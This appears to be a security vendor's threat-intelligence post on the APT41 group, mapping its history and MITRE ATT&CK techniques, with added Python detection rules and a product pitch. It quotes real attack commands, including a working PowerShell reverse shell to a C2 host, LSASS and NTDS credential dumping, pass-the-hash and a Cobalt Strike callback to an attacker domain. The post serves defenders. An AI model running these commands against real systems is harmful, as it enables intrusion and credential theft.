APT41 Cyber Attacks: History, Operations, and Full TTP Analysis
APT41 is a prolific and highly skilled threat actor, active since at least 2007, that distinguishes itself by conducting simultaneous cyber espionage and financially motivated cybercrime operations. This dual-focus, evident since 2014, targets a vast array of sectors, from U.S. state governments to global shipping, logistics, and technology companies. The group is known for its persistence, maintaining long-term unauthorized access for months or even years. A key characteristic of APT41 is its exceptional agility in weaponizing vulnerabilities. Notably, they began exploiting the critical Log4Shell (CVE-2021-44228) vulnerability against at least two U.S. state governments within hours of its public disclosure.
The group's tactics, techniques, and procedures (TTPs) show a high level of operational maturity. Its primary initial access vector is the exploitation of public-facing applications, rapidly weaponizing both n-day and zero-day flaws in Citrix, Zoho, Cisco, and other products. Once inside, APT41 relies heavily on living-off-the-land techniques: a multi-stage delivery chain for payloads such as Cobalt Strike Beacon is built from native Windows utilities like cmd.exe and certutil. Persistence is established through disguised Windows services, web shells, and scheduled tasks. Credential access is comprehensive, from dumping LSASS memory with Procdump and Mimikatz to copying the entire Active Directory database with ntdsutil. To evade detection, the group packs its tools with Themida, uses custom loaders that restore clean files on disk to defeat EDR file scans, and exfiltrates stolen data to legitimate cloud services such as OneDrive, where it blends in with normal traffic.
In this post, we will explore the major historical operations of APT41, highlight their notable campaigns against government and commercial sectors, and examine the group’s tactics, techniques, and procedures to understand how they execute persistent cyber attacks. In the end, we will show how Picus helps defend against this group.
What Are the Major Activities of the APT41 Group?
- 2007 – APT41 has been actively operating since at least this year.
- 2014 – Evidence suggests APT41 began conducting simultaneous cybercrime and cyber espionage operations from this time onward [1].
- 2017 – The ShadowPad modular backdoor, which FireEye initially considered exclusive to APT41 (BARIUM), was first identified in the NetSarang supply-chain compromise [2].
- 20 January 2020 – APT41 began one of its broadest campaigns in recent years. Between this date and 11 March 2020 it attempted to exploit vulnerabilities in Citrix NetScaler/ADC (CVE-2019-19781), Cisco RV320 routers, and Zoho ManageEngine Desktop Central (CVE-2020-10189) at over 75 FireEye customers across more than 20 countries [3].
- 8 March 2020 – Three days after the public disclosure of CVE-2020-10189, APT41 began attempting to exploit the Zoho ManageEngine Desktop Central zero-day at more than a dozen FireEye customers, compromising at least five of them [3].
- September 2020 – Some members of the APT41 group were indicted by the U.S. Department of Justice (DOJ) for charges including unauthorized access to protected computers, aggravated identity theft, money laundering, and wire fraud [4].
- May 2021 – Mandiant responded to an APT41 intrusion targeting a United States state government computer network, marking the initiation of a persistent, months-long campaign against U.S. state governments [4].
- 10 December 2021 – Within hours of the Apache Foundation releasing an advisory for the critical RCE vulnerability in Log4J (CVE-2021-44228/Log4Shell), APT41 began exploiting it to compromise at least two U.S. state governments [4].
- March 2022 – Mandiant reported that between May 2021 and February 2022 APT41 had compromised at least six U.S. state government networks, in part by exploiting a zero-day (CVE-2021-44207) in USAHerds, a livestock management application [4].
- Since 2023 – APT41 has infiltrated and maintained prolonged, unauthorized access to numerous victim networks, primarily targeting organizations in the global shipping and logistics, media and entertainment, technology, and automotive sectors across countries including Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom [5].
Which MITRE ATT&CK Techniques Are Used by APT41?
Tactic: Reconnaissance
T1595 Active Scanning
The threat actor utilizes various tools for actively scanning target organizations to find vulnerabilities. This includes using vulnerability scanners like Acunetix and network scanners such as Nmap for identifying open ports and services.
Hidden web directories and subdomains are discovered by brute force; the subdomain enumeration utilities observed include OneForAll, subdomain3, subDomainsBrute, and Sublist3r.
Specialized scanning is also performed. For instance, JexBoss is used to specifically find and exploit vulnerabilities within JBoss application servers [6].
Tactic: Initial Access
T1190 Exploit Public-Facing Application
Exploiting public-facing applications is a primary initial access vector for this group, which demonstrates agility in weaponizing both n-day and zero-day vulnerabilities.
A mapping of exploited CVEs includes:
- CVE-2019-19781: Citrix ADC / Gateway
- CVE-2021-44228: Apache Log4j (Log4Shell)
- CVE-2020-10189: Zoho ManageEngine Desktop Central
- CVE-2021-44207: USAHerds Application
- CVE-2019-1653 / CVE-2019-1652: Cisco RV320/RV325 Routers
.NET deserialization attacks are conducted, frequently against ASP.NET applications, using malicious ViewState payloads generated with the YSoSerial.NET tool to achieve code execution. Such payloads only execute when the ViewState is not integrity-protected, either because MAC validation is disabled or because the attacker has obtained the machineKey that signs it, which is one reason stolen web.config files are valuable to this group.
SQLmap is also launched in various attacks. The command below replays a captured HTTP request (-r), targets the ASP.NET login form fields (-p), applies a tamper script and a random User-Agent to evade filtering, and asks sqlmap to escalate the injection into an operating-system shell (--os-shell) [6]:
python sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell
T1566.001 Phishing: Spearphishing Attachment
To gain initial compromise, spearphishing emails with malicious Compiled HTML (.chm) file attachments are used for the surgical targeting of specific individuals.
Tactic: Execution
T1047 Windows Management Instrumentation
Windows Management Instrumentation (WMI) was also leveraged in several campaigns for execution. In the example below, wmic creates a process on a remote host (/node) with explicitly supplied domain credentials; on the target this leaves a process-creation event whose parent is WmiPrvSE.exe, a useful detection hook [6]:
wmic /node:172.19.97.102 /user:{redacted}\{redacted} /password:P$ssw0rd0006 process call create "C:\users\Public\COMSysUpdate.exe"
T1053.005 Scheduled Task/Job: Scheduled Task
The Task Scheduler is used to execute malicious files, both on machines where sessions are already established and on new machines identified during reconnaissance. The task below is created on a remote host (/S) with supplied credentials, runs as SYSTEM on a daily schedule, and launches taskhosts.exe, a name chosen to resemble the legitimate taskhost.exe and taskhostw.exe [6]:
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe"
T1059.001 Command and Scripting Interpreter: PowerShell
PowerShell is used to obtain a reverse shell. The one-liner below runs hidden and non-interactive with the execution policy bypassed (-nop -W hidden -noni -ep bypass), connects back to the C2 server on TCP port 80, reads commands from the socket, runs each one with Invoke-Expression, and writes the output back, giving the operator remote command execution [6]:
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
T1059.003 Command and Scripting Interpreter: Windows Command Shell
A notably complex, multi-stage process built on the Windows Command Shell (cmd.exe) was used to deliver the Cobalt Strike Beacon payload covertly and intact [6]:
- Payload encoding and chunking: the Beacon executable was Base64 encoded and the resulting text split into chunks (775 and 1,024 characters were observed).
- Staged writing: the chunks were appended one at a time to a temporary text file (for example C:\dns.txt) with repeated echo <chunk> >> C:\dns.txt commands; in one case this was repeated 154 times.
- Decoding via certutil: the built-in certutil utility was then run with -decode to turn the Base64 file (C:\dns.txt) back into an executable (C:\dns.exe).
- Integrity check: certutil was run again with -hashfile to verify the executable's hash and confirm an error-free decode.
- Final execution: the executable was renamed, moved between directories to hide tracks, and finally launched.
Each step on its own looks mundane; the detection value lies in correlating many echo appends to one file with a certutil -decode of that same file on the same host.
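The chain above is easy to miss if each command is judged alone. The following Python rule is added here as an illustration and is not code from the page, from Group-IB, or from Picus: it correlates process-creation records on one host, stitches together the chunks from repeated echo >> appends to the same file, checks whether the reassembled Base64 decodes to a PE image (MZ header), and links that file to a later certutil -decode and -hashfile. The ProcEvent record layout, the host names, and the sample events (including the stand-in payload, which is only an MZ header followed by zero bytes) are constructed for the example.

```python
import base64
import binascii
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon EID 1 / Security 4688 style), reduced to what the rule needs."""
    ts: int        # seconds since epoch
    host: str
    cmdline: str


# "echo <chunk> >> C:\file": the chunk is a run of non-space characters, the target a Windows path.
ECHO_APPEND = re.compile(r'\becho\s+(?P<chunk>\S+)\s*>>\s*(?P<path>"?[A-Za-z]:\\[^"\s]+"?)', re.IGNORECASE)
# certutil -decode <src> <dst> and certutil -hashfile <file>; "--" is tolerated as well as "-".
CERTUTIL_DECODE = re.compile(
    r'certutil(?:\.exe)?\s+-{1,2}decode\s+(?P<src>"?[A-Za-z]:\\[^"\s]+"?)\s+(?P<dst>"?[A-Za-z]:\\[^"\s]+"?)',
    re.IGNORECASE)
CERTUTIL_HASH = re.compile(r'certutil(?:\.exe)?\s+-{1,2}hashfile\s+(?P<path>"?[A-Za-z]:\\[^"\s]+"?)', re.IGNORECASE)


def _norm(path):
    return path.strip('"').lower()


def reassemble_appends(events, min_chunks=3):
    """Per (host, file), collect the chunks written by repeated echo >> appends, in time order."""
    parts = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        m = ECHO_APPEND.search(ev.cmdline)
        if m:
            parts[(ev.host, _norm(m.group("path")))].append(m.group("chunk"))
    return {k: v for k, v in parts.items() if len(v) >= min_chunks}


def decode_base64(text):
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def detect_certutil_staging(events, min_chunks=3):
    """Flag files staged chunk-by-chunk that decode to a PE image or are fed to certutil -decode."""
    decodes, hashed = [], set()
    for ev in events:
        m = CERTUTIL_DECODE.search(ev.cmdline)
        if m:
            decodes.append((ev.host, _norm(m.group("src")), _norm(m.group("dst"))))
        h = CERTUTIL_HASH.search(ev.cmdline)
        if h:
            hashed.add((ev.host, _norm(h.group("path"))))
    findings = []
    for (host, path), chunks in reassemble_appends(events, min_chunks).items():
        blob = decode_base64("".join(chunks))
        is_pe = blob is not None and blob[:2] == b"MZ"
        targets = [dst for (h, src, dst) in decodes if h == host and src == path]
        if not (is_pe or targets):
            continue
        target = targets[0] if targets else None
        findings.append({
            "host": host,
            "staged_file": path,
            "chunks": len(chunks),
            "decoded_pe": is_pe,
            "decode_target": target,
            "hash_checked": (host, target) in hashed,
        })
    return findings


def build_sample_events():
    """Constructed events: the page's staging chain on WS-042, plus benign noise on WS-077."""
    payload = b"MZ\x90\x00" + bytes(60)  # stand-in for a PE image; only the MZ header matters here
    b64 = base64.b64encode(payload).decode()
    t0 = 1_700_000_000
    events = [ProcEvent(t0 + i, "WS-042", rf"cmd.exe /c echo {b64[i:i + 16]} >> C:\dns.txt")
              for i in range(0, len(b64), 16)]
    events += [
        ProcEvent(t0 + 100, "WS-042", r"certutil -decode C:\dns.txt C:\dns.exe"),
        ProcEvent(t0 + 101, "WS-042", r"certutil -hashfile C:\dns.exe SHA256"),
        ProcEvent(t0 + 102, "WS-042", r'cmd.exe /c move C:\dns.exe "C:\ProgramData\svchost.exe"'),
        ProcEvent(t0 + 200, "WS-077", r"cmd.exe /c echo build ok >> C:\logs\build.txt"),     # one benign append
        ProcEvent(t0 + 201, "WS-077", r"certutil -hashfile C:\installers\setup.msi SHA256"),  # benign hash check
    ]
    return events


if __name__ == "__main__":
    for finding in detect_certutil_staging(build_sample_events()):
        print(finding)
```

The rule deliberately keys on the reassembled content rather than on certutil alone, because certutil -hashfile is common in legitimate administration; a chunked file that decodes to an MZ header is not.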
T1218.011 System Binary Proxy Execution: Rundll32
The rundll32.exe binary is used to execute malicious loaders and payloads.
T1569.002 System Services: Service Execution
Windows services are commonly leveraged for both execution and persistence: services are created and started to run malicious executables or scripts, such as install.bat. The command below, observed in the ColunmTK campaign (named after the C2 domain colunm.tk), creates the service on a remote host through the Service Control Manager; the space after binPath= is required by sc [6]:
sc \\<IP> Create SuperIe binPath= "cmd.exe /k "c:\users\public\install.bat"
Tactic: Persistence
T1505.003 Server Software Component: Web Shell
In one intrusion, a combination of ANTSWORD and BLUEBEAM web shells was deployed for persistence. These web shells were discovered on an Apache Tomcat Manager server and had been active since at least 2023. They were used to run certutil.exe to download the DUSTPAN dropper, which in turn stealthily loaded the BEACON payload [5].
T1543.003 Create or Modify System Process: Windows Service
New Windows services are created to maintain persistence [6].
sc \\172.26.16.81 Create SuperIe binPath= "cmd.exe /k c:\users\public\SecurityHealthSystray.exe"
The DUSTPAN malware was also made persistent through services, with one instance being named "Windows Defend" to avoid detection.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
In some instances, malicious files were copied into a user's Startup folder on remote machines over the administrative share. A file in the per-user Startup folder runs each time that user logs on (not at system boot), so the persistence is tied to the targeted account, here the domain administrator's profile [6]:
copy C:\temp\LxpSvc.exe "\\192.168.100.4\c$\Users\administrator.{redacted}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxpSvc.exe"
T1574.001 Hijack Execution Flow: DLL
DLL side-loading was used to execute the DUSTTRAP malware: a legitimate program, the AhnLab uninstaller, was abused to load the malicious DUSTTRAP payload. Other benign, code-signed Windows binaries were used for the same purpose.
Tactic: Defense Evasion
T1027.002 Obfuscated Files or Information: Software Packing
To remain unnoticed in a victim's network, the threat actors packed their malicious files with Themida, a well-known commercial packer/protector.
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Encryption is used to hide malicious payloads from security products and analysis. The DUSTTRAP launcher was built to decrypt its payload using AES-128-CFB. Similarly, the DUSTPAN dropper was observed loading BEACON payloads that had been encrypted with ChaCha20.
T1036.005 Match Legitimate Resource Name or Location
Malware is disguised by naming it to match legitimate system files. For example, the DUSTPAN malware was observed being executed with names like w3wp.exe (a common IIS process) and conn.exe to blend in.
T1070.004 Indicator Removal: File Deletion
The group cleans up artifacts to hide its tracks, such as deleting database dumps after exfiltration.
Also when malicious files were no longer required, they were deleted from the host [6].
del C:\temp\LxpSvc.exe
A more advanced variation involves the DUSTTRAP loader: it trojanizes a legitimate DLL in memory but then restores the original, clean file on disk. This is done to evade EDR solutions that perform scans "on file close."
T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification
File and directory permissions are modified. In the example below, the IIS worker-process group is granted full control over a dropped .asp file under the web root, consistent with making a web shell readable and executable by the web server [6]:
icacls \\192.168.0.243\c$\www\{redacted}\test2.asp /grant IIS_IUSRS:F
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
The memory of the Local Security Authority Subsystem Service (LSASS) process is a primary source of credentials, since it holds the secrets of every logged-on user. Procdump and Mimikatz are used to dump it; the Procdump command below writes a full memory dump (-ma) that can be parsed offline with Mimikatz's sekurlsa module [6]:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
T1003.002 OS Credential Dumping: Security Account Manager
Account data is also extracted from the Security Account Manager (SAM) database, which stores local account password hashes. Attackers copy it either from the registry (HKLM\SAM) with reg save or from the on-disk hive (%WINDIR%\System32\Config\SAM) via a volume shadow copy. The SAM hive alone is not enough: its hashes are encrypted with the boot key held in the SYSTEM hive, so a matching reg save HKLM\SYSTEM is a strong co-indicator [6]:
reg save HKLM\SAM C:\perflogs\sam.save
T1003.003 OS Credential Dumping: NTDS
The Windows utility ntdsutil was used frequently in 2021 campaigns to create an Install From Media (IFM) copy of ntds.dit, the Active Directory database, which contains the user and group objects and the password hashes of every domain account. The two forms below are the same command: ntdsutil accepts any unambiguous prefix of a command word, so "ac i ntds" equals "activate instance ntds" and q equals quit, and detection logic keyed on the full words misses the short form [6]:
ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q
ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit
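The abbreviation point above is worth encoding. The Python below is an added example, not code from the page, Group-IB, or Picus: it tokenizes an ntdsutil command line (keeping each quoted group as one token), expands abbreviated command words positionally against a small table of IFM-related commands (an assumption; ntdsutil has many more menus than are modelled here), and maps the three credential-dumping commands shown on this page to their sub-technique IDs. Both of the page's ntdsutil spellings normalize to the same canonical string.

```python
import re

# ntdsutil resolves any unambiguous prefix of a command word, so "ac i ntds" is the same
# command as "activate instance ntds" and "q" the same as "quit". Only the commands
# needed for IFM media creation are modelled (assumption for this example).
NTDSUTIL_COMMANDS = [
    ("activate", "instance"),
    ("ifm",),
    ("create", "sysvol", "full"),
    ("create", "full"),
    ("quit",),
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split on whitespace, keeping each double-quoted group as a single token."""
    return [q or u for q, u in _TOKEN.findall(cmdline) if q or u]


def expand_ntdsutil_token(token):
    """Expand abbreviated command words positionally; words after the command are arguments."""
    words = token.lower().split()
    for pattern in NTDSUTIL_COMMANDS:
        if len(words) >= len(pattern) and all(full.startswith(w) for w, full in zip(words, pattern)):
            return " ".join(list(pattern) + words[len(pattern):])
    return " ".join(words)  # unknown command: leave as typed


def normalize_ntdsutil(cmdline):
    """Canonical 'cmd | cmd | ...' form of an ntdsutil command line, or '' if it is not ntdsutil."""
    tokens = tokenize(cmdline)
    if not tokens or not re.search(r"ntdsutil(?:\.exe)?$", tokens[0], re.IGNORECASE):
        return ""
    return " | ".join(expand_ntdsutil_token(t) for t in tokens[1:])


# The other two credential-dumping commands on this page need no normalization.
LSASS_DUMP = re.compile(r"procdump(?:64)?(?:\.exe)?\b.*\s-ma\s+lsass", re.IGNORECASE)
MIMIKATZ_LSASS = re.compile(r"sekurlsa::(?:logonpasswords|minidump)", re.IGNORECASE)
SAM_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+\"?hklm\\sam\b", re.IGNORECASE)


def classify(cmdline):
    """Map one process command line to the ATT&CK sub-techniques it evidences."""
    hits = set()
    if LSASS_DUMP.search(cmdline) or MIMIKATZ_LSASS.search(cmdline):
        hits.add("T1003.001")
    if SAM_SAVE.search(cmdline):
        hits.add("T1003.002")
    steps = normalize_ntdsutil(cmdline).split(" | ")
    if (any(s.startswith("activate instance ntds") for s in steps) and "ifm" in steps
            and any(s.startswith(("create full", "create sysvol full")) for s in steps)):
        hits.add("T1003.003")
    return hits


if __name__ == "__main__":
    for line in (r'ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q',
                 r'ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit'):
        print(normalize_ntdsutil(line), classify(line))
```

The same idea applies to any LOLBin with a prefix-tolerant parser: normalize first, then match, rather than enumerating every spelling in a rule.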
T1552.001 Unsecured Credentials: Credentials In Files
A search is conducted across files and directories for strings containing keywords like "user" or "password" to find unsecured credentials [6].
findstr /c:"User" /c:"Password" /si web.config
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
A tool called BrowserGhost is used to obtain stored credentials from web browsers [6].
BrowserGhost.exe >> iis.txt
Tactic: Discovery
T1012 Query Registry
The registry is queried to find information such as the current RDP port or network settings; the command below reads the PortNumber value of the RDP-Tcp listener [6]:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
T1016 System Network Configuration Discovery
Network configuration information is obtained by directly querying specific registry keys [6]:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}"
T1018 Remote System Discovery
The ping command, often inside a FOR loop, is used with a single echo request (-n 1) to identify live hosts on the local network [6].
The SETSPN utility is also used to discover which domain computers run specific services, such as IIS, SQL, and MSSQL, by querying their registered service principal names [6].
ping -n 1 PIST-FILE-SRV
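A single ping -n 1 is noise; the signal is one host emitting single-echo pings to many distinct targets in a short window, or the FOR loop that generates them. The Python below is an added example (not from the page, Group-IB, or Picus): a sliding-window count of distinct ping targets per host over constructed process-creation events, plus a second check for the loop command line itself. The event layout, the host names, the 60-second window and the 10-target threshold are assumptions to be tuned to your environment.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: int        # seconds since epoch
    host: str
    cmdline: str


# "for /L ... do ping -n 1 ...": the loop appears once as a cmd.exe command line, the pings many times.
FOR_PING_LOOP = re.compile(r"\bfor\s+/l\b.*\bping(?:\.exe)?\b.*-n\s+1\b", re.IGNORECASE)


def parse_single_ping(cmdline):
    """Return the target of a 'ping -n 1 <target>' invocation, else None."""
    parts = cmdline.split()
    if len(parts) < 4 or not re.search(r"ping(?:\.exe)?$", parts[0], re.IGNORECASE):
        return None
    for i in range(1, len(parts) - 2):
        if parts[i].lower() == "-n" and parts[i + 1] == "1":
            return parts[-1].lower()
    return None


def max_distinct_targets(pings, window):
    """Largest number of distinct targets inside any window of `window` seconds, and that window's start."""
    pings.sort()
    counts, left, best, best_start = Counter(), 0, 0, None
    for ts, target in pings:
        counts[target] += 1
        while ts - pings[left][0] > window:          # drop pings that fell out of the window
            old = pings[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        if len(counts) > best:
            best, best_start = len(counts), pings[left][0]
    return best, best_start


def detect_ping_sweeps(events, window=60, min_targets=10):
    """Per host: flag a burst of single-echo pings to many targets; also report FOR/ping loop command lines."""
    by_host = defaultdict(list)
    loops = []
    for ev in events:
        if FOR_PING_LOOP.search(ev.cmdline):
            loops.append((ev.host, ev.ts))
        target = parse_single_ping(ev.cmdline)
        if target:
            by_host[ev.host].append((ev.ts, target))
    sweeps = {}
    for host, pings in by_host.items():
        best, start = max_distinct_targets(pings, window)
        if best >= min_targets:
            sweeps[host] = {"distinct_targets": best, "window_start": start}
    return {"sweeps": sweeps, "loops": loops}


def build_sample_events():
    """Constructed events: a 40-host sweep from WS-042 and two routine pings from WS-077."""
    t0 = 1_700_000_000
    events = [ProcEvent(t0, "WS-042", r"cmd.exe /c for /L %i in (1,1,40) do ping -n 1 10.0.1.%i")]
    events += [ProcEvent(t0 + i, "WS-042", f"ping -n 1 10.0.1.{i}") for i in range(1, 41)]
    events += [ProcEvent(t0 + 5, "WS-077", "ping -n 1 PIST-FILE-SRV"),
               ProcEvent(t0 + 3600, "WS-077", "ping -n 1 PIST-FILE-SRV"),
               ProcEvent(t0 + 7200, "WS-077", "ping www.example.com")]
    return events


if __name__ == "__main__":
    print(detect_ping_sweeps(build_sample_events()))
```

Counting distinct targets rather than raw ping volume keeps a monitoring host that pings the same server every minute from tripping the rule.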
T1046 Network Service Discovery
The publicly available tool cping is used to identify local computers that are vulnerable to SMB attacks [6].
C:\PerfLogs\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 > 10.txt
T1049 System Network Connections Discovery
The built-in netstat utility is used to identify active network connections [6].
netstat -ano
T1057 Process Discovery
Reconnaissance is conducted on remote devices to determine if specific files, which had been previously downloaded, are currently running.
tasklist /pid 1428 /f
T1069 Permission Groups Discovery
A list of users and computers within specific high-privilege Windows groups is obtained.
net group "Domain Admins" /domain
T1082 System Information Discovery
Basic system configuration information, such as the Windows version and system architecture, is gathered.
echo %PROCESSOR_ARCHITECTURE%
T1087 Account Discovery
The net utility is used to list domain accounts and to collect lists of administrators, with the output redirected to a file for later collection:
net user /domain > 1.txt
T1124 System Time Discovery
The domain time is checked, often to synchronize malicious activities or understand logging timestamps.
net time /domain
T1135 Network Share Discovery
Attempts are made to detect available network shares and drives [6].
net share
T1482 Domain Trust Discovery
Domain structure is enumerated. The dsquery site command below lists the Active Directory sites of the forest, which reveals its physical topology rather than its trust relationships:
dsquery site
Tactic: Lateral Movement
T1550.002 Use Alternate Authentication Material: Pass the Hash
Pass-the-hash attacks are performed with Mimikatz's sekurlsa::pth module. The line below is how Cobalt Strike's pth command drives it: the stolen NTLM hash is injected into a new logon session and the resulting token is handed back to Beacon through a named pipe [6]:
mimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 70c64df2976 > \\.\pipe\277bf3"
T1570 Lateral Tool Transfer
Tools and payloads are transferred to other systems on the network. The Cobalt Strike jump psexec64 command below copies a Beacon executable to the remote host's ADMIN$ share and starts it as a service through the Service Control Manager; the payload calls back over DNS to the ns1.colunm.tk listener [6]:
jump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager (\\[redacted]\ADMIN$\c3632b3.exe)
Tactic: Collection
T1005 Data from Local System
Files are collected from the local system, including from volume shadow copies and the Windows logging system [6].
vssadmin list shadows
T1560.001 Archive Collected Data: Archive via Utility
Data is compressed using an archiving utility before exfiltration, likely to reduce file size and detection. The rar utility was observed being used to archive data downloaded from internal Oracle databases.
A portable archiver (like 7z.exe) is often downloaded to the compromised device, used to archive the target files, and then the archive is exfiltrated [6].
7z.exe a syslog.7z Intl
T1602 Data from Configuration Repository
In one case involving a software developer, access was gained to a private Git repository that stored sensitive data, including credentials for remote servers, private certificates, and server lists. The clone was run from Beacon's shell command with the compromised jenkins account [6]. Strictly, a source repository maps to ATT&CK T1213.003 (Data from Information Repositories: Code Repositories); T1602 covers configuration stores of network devices.
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Playbook2"
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
Communication with C&C servers is established using HTTP and HTTPS listeners [6].
T1071.004 Application Layer Protocol: DNS
DNS tunnels are also used as a method to hide C&C communication [6].
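The Cobalt Strike listener seen in the Lateral Movement section (windows/beacon_dns/reverse_dns_txt via ns1.colunm.tk) is the kind of channel that a per-domain profile of DNS queries exposes. The Python below is an added example, not code from the page, Mandiant, Group-IB, or Picus: over a constructed resolver log it computes, per registered domain, the share of TXT queries, the number of distinct names, and the mean length and entropy of the leftmost label, then flags domains that look like a tunnel. The log format, the naive last-two-labels domain cut, the colunm.tk sample queries, and the thresholds are assumptions.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Naive registrable-domain cut (last two labels): right for colunm.tk or example.com, wrong for
    two-level public suffixes such as co.uk; a public-suffix list would fix that (assumption)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def profile_dns(lines):
    """Per registered domain: query count, TXT share, distinct names, mean leftmost-label length and entropy.
    Input lines are '<ts> <client> <qtype> <qname>' (a constructed format, not a real resolver log)."""
    acc = defaultdict(lambda: {"n": 0, "txt": 0, "names": set(), "len": 0, "ent": 0.0})
    for line in lines:
        _ts, _client, qtype, qname = line.split()
        dom = registered_domain(qname)
        first = qname.lower().split(".")[0]
        a = acc[dom]
        a["n"] += 1
        a["txt"] += qtype.upper() == "TXT"
        a["names"].add(qname.lower())
        a["len"] += len(first)
        a["ent"] += shannon_entropy(first)
    return {dom: {"queries": a["n"], "txt_ratio": a["txt"] / a["n"], "unique_names": len(a["names"]),
                  "avg_label_len": a["len"] / a["n"], "avg_entropy": a["ent"] / a["n"]}
            for dom, a in acc.items()}


def flag_dns_tunnels(lines, min_unique=20, min_txt_ratio=0.5, min_label_len=16, min_entropy=3.0):
    """Flag a domain when many distinct names are queried and either most queries are TXT (the
    reverse_dns_txt listener) or the leftmost labels look like encoded data (A-record beacons)."""
    flagged = {}
    for dom, p in profile_dns(lines).items():
        if p["unique_names"] < min_unique:
            continue
        if p["txt_ratio"] >= min_txt_ratio or (p["avg_label_len"] >= min_label_len
                                              and p["avg_entropy"] >= min_entropy):
            flagged[dom] = p
    return flagged


def build_sample_log():
    """Constructed log: 30 TXT queries with hex-like labels under ns1.colunm.tk from one client,
    plus ordinary A/AAAA lookups of a handful of example.com names from several clients."""
    t0 = 1_700_000_000
    lines = []
    for i in range(30):
        label = hashlib.sha256(f"beacon{i}".encode()).hexdigest()[:24]  # stands in for encoded beacon data
        lines.append(f"{t0 + 60 * i} 10.0.0.5 TXT {label}.ns1.colunm.tk")
    for i in range(25):
        name = ["www", "mail", "cdn", "api", "login"][i % 5]
        lines.append(f"{t0 + 7 * i} 10.0.0.{6 + i % 3} {'A' if i % 2 else 'AAAA'} {name}.example.com")
    return lines


if __name__ == "__main__":
    for dom, profile in flag_dns_tunnels(build_sample_log()).items():
        print(dom, profile)
```

Beacon's DNS channel can also run over A records only; that case is what the label-length and entropy branch is for, and those thresholds need tuning against your own resolver's baseline (CDNs and anti-spam services legitimately generate long, high-entropy labels).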
T1090.001 Proxy: Internal Proxy
A tool called FRPC, the client of the open-source frp reverse proxy, is often used to proxy traffic during attacks. Its server address and port mappings live in the ini file passed with -c, so that configuration file is as useful a forensic artifact as the binary itself [6]:
frcp.exe -c frcp.ini
T1105 Ingress Tool Transfer
Cobalt Strike is used to upload files onto compromised devices. In some targeted attacks, these files were uploaded from special directories named specifically for the victim organization [6].
upload C:\Users\Administrator\Desktop\cs\dns\COMSysUpdate.ocx
Tactic: Exfiltration
T1041 Exfiltration Over C2 Channel
During the exfiltration stage, various server configurations, backup data, and user data were accessed and stolen [6].
download D:\projects\{redacted}\web.config;
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Stolen data was exfiltrated to legitimate cloud services, specifically OneDrive, to blend in with normal network traffic. This was accomplished using PINEGROVE, a command-line tool designed to upload files to OneDrive using its API.
How Does Picus Simulate APT41 Attacks?
We also strongly suggest simulating APT41 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT41:
Threat ID | Threat Name | Attack Module
27065 | APT41 Threat Group Campaign Malware Email Threat | Network Infiltration
25568 | APT41 Threat Group Campaign Malware Download Threat | Network Infiltration
72247 | APT41 Threat Group Campaign | Windows Endpoint
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
